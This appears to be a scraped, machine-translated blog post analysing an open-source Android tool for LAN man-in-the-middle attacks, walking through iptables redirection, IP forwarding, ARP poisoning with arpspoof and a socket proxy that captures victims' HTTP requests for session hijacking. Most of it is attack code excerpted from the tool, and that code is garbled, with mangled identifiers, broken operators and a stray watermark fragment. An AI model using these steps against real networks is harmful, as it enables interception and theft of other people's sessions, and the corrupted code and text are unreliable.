Android man-in-the-middle attack

0x00

The idea of an Android man-in-the-middle attack is to hijack conversations between attacked machines and servers in a local area network. The attacked machine and server are working properly on the surface and have actually been hijacked by middlemen. This process can be clarified from a single graph.

The data sent by the attacking host is first passed through the attacker. The data returned from the server is also passed by the attacker and sent to the attacked host.

0x01

Android Open source broker attack Sample. Please refer to HTTPS://GITHUB.COM/SSUN125/LANMITM. We mainly analyze the principle of session hijacking in the effect preview in this link.

Watermark/2/text/ahr0cdovl2jsb2cuy3nkbi5uzxqv/font/5a6l5l2t/fontsize/400/fill/i0jbqkfcma==/dissolve/70/gravity /center "/>

Analysis of HTTPS://GITHUB.COM/SSUN125/LANMITM source code, to achieve ARP spoofing, there are four key steps:

1. NAT packet forwarding using iptables

public static final string[] Port_redirect_cmd = {"Iptables-t nat-f", "Iptables-f", "Iptables-t nat-i postrouting-s 0/ 0-j Masquerade "," Iptables-p FORWARD ACCEPT "," Iptables-t nat-a prerouting-j dnat-p tcp--dport +--to "+ AppContext. GetIP () + ":" + httpproxy.http_proxy_port};

This command is called in the Starthttpproxy method of the Proxyservice class.

2. Turn on port forwarding and agree to forward packets like routers

Private string[] Forward_commands = {"Echo 1 >/proc/sys/net/ipv4/ip_forward", "Echo 1 >/proc/sys/net/ipv6/conf/al L/forwarding "};

This is called in the Onstartcommand method of the Arpservice class.

3. ARP poisoning

if (One_way_host & arp_cheat_way)! = 0) {if (target_ip = = null) TARGET_IP = Appcontext.gettarget (). GetIP (); if (!target _ip.equals (Appcontext.getgateway ())) Arp_spoof_cmd = Getfilesdir () + "/arpspoof-i" + interfacename+ "-T" + target_ip + "" + Appcontext.getgateway (); elsearp_spoof_cmd = Getfilesdir () + "/arpspoof-i" + interfacename+ "-T" + APPCONTEXT.GETG  Ateway () + "" + Target_ip;arpspoof = new Thread () {@Overridepublic void run () {Shellutils.execcommand (Arp_spoof_cmd, True, false);}}; Arpspoof.start ();} if ((One_way_route & arp_cheat_way)! = 0) {arp_spoof_recv_cmd = Getfilesdir () + "/arpspoof-i" + interfacename+ "-t "+ appcontext.getgateway () +" "+ Appcontext.getip (); arpspoofrecv = new Thread () {@Overridepublic void run () {shellutils. ExecCommand (Arp_spoof_recv_cmd, True, false);}}; Arpspoofrecv.start ();}

this is inof the Arpservice classCalled in the Onstartcommand method.

4, in the attacker machine based on the socket principle, create a webserver, similar to the principle of using NANOHTTPD to achieve a simple webserver.

This can be obtained by the attacker's request to the attacker. and displayed on the interface.

The core code is as follows:

public class Httpproxy extends Thread {... @Overridepublic void run () {try {mserversocket = new ServerSocket (); Mserverso Cket.setreuseaddress (True); Mserversocket.bind (New Inetsocketaddress (Appcontext.getinetaddress (), HTTP_PROXY_PORT ), executor = Executors.newcachedthreadpool (), while (!stop) {Socket client = mserversocket.accept ();D Ealthread Dealthread = Null;switch (mproxymode) {case mode_proxy_simple:dealthread = new Simpledealthread (client, Monrequestlistener); Break;case mode_proxy_deep:dealthread = new Deepdealthread (client, monrequestlistener); break;} Executor.execute (Dealthread);}} catch (IOException e) {e.printstacktrace ();} finally {if (mserversocket! = null) {try {mserversocket.close ();} catch (Ioex Ception e) {e.printstacktrace ();}} if (executor! = null) {Executor.shutdownnow ();}}} ......}

Android man-in-the-middle attack